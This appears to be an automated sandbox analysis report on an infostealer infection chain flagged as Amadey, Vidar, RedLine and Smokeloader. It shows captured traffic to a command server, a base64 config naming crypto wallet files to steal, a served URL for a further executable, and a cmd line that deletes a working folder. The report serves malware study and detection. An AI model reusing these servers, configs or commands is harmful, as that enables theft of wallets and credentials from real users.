2024-07-26 10:57:42 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	60829	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:43 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFBFBFIIJDAKECAKKJE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:43 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------EBFBFBFIIJDAKECAKKJEContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------EBFBFBFIIJDAKECAKKJEContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------EBFBFBFIIJDAKECAKKJECont
2024-07-26 10:57:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:44 UTC	71	IN	Data Raw: 33 63 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 3cRGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	60831	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:45 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 457 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:45 UTC	457	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------IJEHCGIJECFIECBFIDGDCont
2024-07-26 10:57:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:45 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	60834	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:47 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:47 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------KJDAECAEBKJJJKEBKKJDCont
2024-07-26 10:57:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:47 UTC	79	IN	Data Raw: 34 34 0d 0a 4e 6a 6b 77 4d 7a 55 79 66 47 68 30 64 48 41 36 4c 79 38 78 4f 54 67 75 4e 44 59 75 4d 54 63 34 4c 6a 45 30 4e 53 38 33 4f 44 51 33 4e 44 4d 34 4e 7a 59 33 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 44NjkwMzUyfGh0dHA6Ly8xOTguNDYuMTc4LjE0NS83ODQ3NDM4NzY3LmV4ZXwxfGtra2t80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	60848	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:59 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 498 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:59 UTC	498	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------EBAAFCAFCBKFHJJJKKFHCont
2024-07-26 10:57:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	60850	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:58:00 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:58:00 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 44 47 49 49 49 4a 44 42 47 44 47 44 41 4b 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------DBFIDGIIIJDBGDGDAKKFContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------DBFIDGIIIJDBGDGDAKKFContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------DBFIDGIIIJDBGDGDAKKFCont
2024-07-26 10:58:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:58:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:55:59
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\IRqsWvBBMc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IRqsWvBBMc.exe"
Imagebase:	0x140000
File size:	1'947'648 bytes
MD5 hash:	78343EFCB6F731CD7668E648ED73E40F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2144127481.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2103618425.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:56:01
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x8f0000
File size:	1'947'648 bytes
MD5 hash:	78343EFCB6F731CD7668E648ED73E40F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2168239897.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2127712847.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:56:01
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x8f0000
File size:	1'947'648 bytes
MD5 hash:	78343EFCB6F731CD7668E648ED73E40F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2129982774.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2170594328.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:57:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x7ff66e660000
File size:	1'947'648 bytes
MD5 hash:	78343EFCB6F731CD7668E648ED73E40F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2708396378.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	06:57:05
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000019001\server.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000019001\server.exe"
Imagebase:	0x7ff683110000
File size:	2'711'040 bytes
MD5 hash:	BF9ACB6E48B25A64D9061B86260CA0B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 13%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:57:08
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe"
Imagebase:	0x400000
File size:	356'864 bytes
MD5 hash:	BEA49EAB907AF8AD2CBEA9BFB807AAE2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.3355199740.00000000024FD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:57:57
Start date:	26/07/2024
Path:	C:\ProgramData\CFHIIJDBKE.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\CFHIIJDBKE.exe"
Imagebase:	0x400000
File size:	12'016'128 bytes
MD5 hash:	190E4ED7759276E78D16398673996B2B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:57:59
Start date:	26/07/2024
Path:	C:\ProgramData\CFHIIJDBKE.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\CFHIIJDBKE.exe
Imagebase:	0x400000
File size:	12'016'128 bytes
MD5 hash:	190E4ED7759276E78D16398673996B2B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	06:58:01
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFCFBFHIEBKJ" & exit
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	06:58:01
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	06:58:01
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x960000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	06:58:01
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3000
Imagebase:	0xa10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 04DE0C04 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 164a9f63888100d6deeba844f24c79a914a20430ced07aa7c6bd0a03234c8723
Instruction ID: b38e3c2937b71afb75309dcae109393bbb3a904851dcdc52a57215c69e3cd390
Opcode Fuzzy Hash: 164a9f63888100d6deeba844f24c79a914a20430ced07aa7c6bd0a03234c8723
Instruction Fuzzy Hash: D20188EB30E135BD7143A5836B14ABA266DE5D23303308822F8C7CA202F2D0EA59F571

Function 04DE0BF8 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bdaddb73a3184f89255bac2f911b818777274413bd3084813b83986251c1b22
Instruction ID: 822eab7da91444dd3704bab4f73e7f3325347c0b195cc50295ebcaae7a8552ef
Opcode Fuzzy Hash: 9bdaddb73a3184f89255bac2f911b818777274413bd3084813b83986251c1b22
Instruction Fuzzy Hash: 2A018CEB34E139BD6143B5836B14ABB266DE5D27303708822F4C7CA502F2D0EA59F571

Function 04DE0C01 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c915ce9fcde14e68bb527efeaaf021d584c5a0677c8cf9e0bc162b2fda1cbe63
Instruction ID: 1aae6bcbd098ddfa2927edebd27f1d118d98a61aba5deea550233ec23e7681bc
Opcode Fuzzy Hash: c915ce9fcde14e68bb527efeaaf021d584c5a0677c8cf9e0bc162b2fda1cbe63
Instruction Fuzzy Hash: 85018CEB30E135AD6143A5836B14ABA2669E5D27303308822F4C7CA102F2D0EA59F571

Function 04DE0C22 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682733c684b08e60f72fd149f3e332709789f23b9dd542617b3b6730c87ce24d
Instruction ID: b344c9bc7e521623318cd7c4abec278c8c623318c1f7f13772d32d5b99737e74
Opcode Fuzzy Hash: 682733c684b08e60f72fd149f3e332709789f23b9dd542617b3b6730c87ce24d
Instruction Fuzzy Hash: 1A01A7F760E175AEA603A5475A149BA3B78E9D17307308417F4C6CB102F2D1E909F631

Function 04DE0C95 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa4dc44d3df6318c655cabe82b2c0f6e4fb9368872695bf3661084f31029b544
Instruction ID: 77e1ccc987af291d0904afd9096bc2a32613dc34767e7d7b9d6646324edd0ccc
Opcode Fuzzy Hash: fa4dc44d3df6318c655cabe82b2c0f6e4fb9368872695bf3661084f31029b544
Instruction Fuzzy Hash: 9E0162B660E178EDA603B5836B14AFA3B78E6D17317308416F4D689501F2D1FA05F971

Function 04DE0C63 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35962f7d93441a5b5d515366e022ef394915849d5339afba5f85e54ef1ad4d70
Instruction ID: 57d259b4d86dc2b8d872545ed89e1d90a3619776b18782ba4fef861831ce030f
Opcode Fuzzy Hash: 35962f7d93441a5b5d515366e022ef394915849d5339afba5f85e54ef1ad4d70
Instruction Fuzzy Hash: 51F0F9F760E071ADA213E5436A54AB62B69D4D53303314817F4D2CA142F2C1B90AF671

Function 04DE0CC2 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e362b67da56b4b13afd5c630a6166debb5610d2e6b270b1826ef54181e5ea5
Instruction ID: 76c6ae8007f886b09958904b86e4e0abab261b58375835475de9b0e6aa65129a
Opcode Fuzzy Hash: 88e362b67da56b4b13afd5c630a6166debb5610d2e6b270b1826ef54181e5ea5
Instruction Fuzzy Hash: 17F0FAEB20E072ADB113B4436A14BFB2B29E1D17707318816F0D2CA002F2C0B94AF970

Function 04DE0C41 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2145926155.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4de0000_IRqsWvBBMc.jbxd

Similarity

API ID:
String ID:
API String ID:
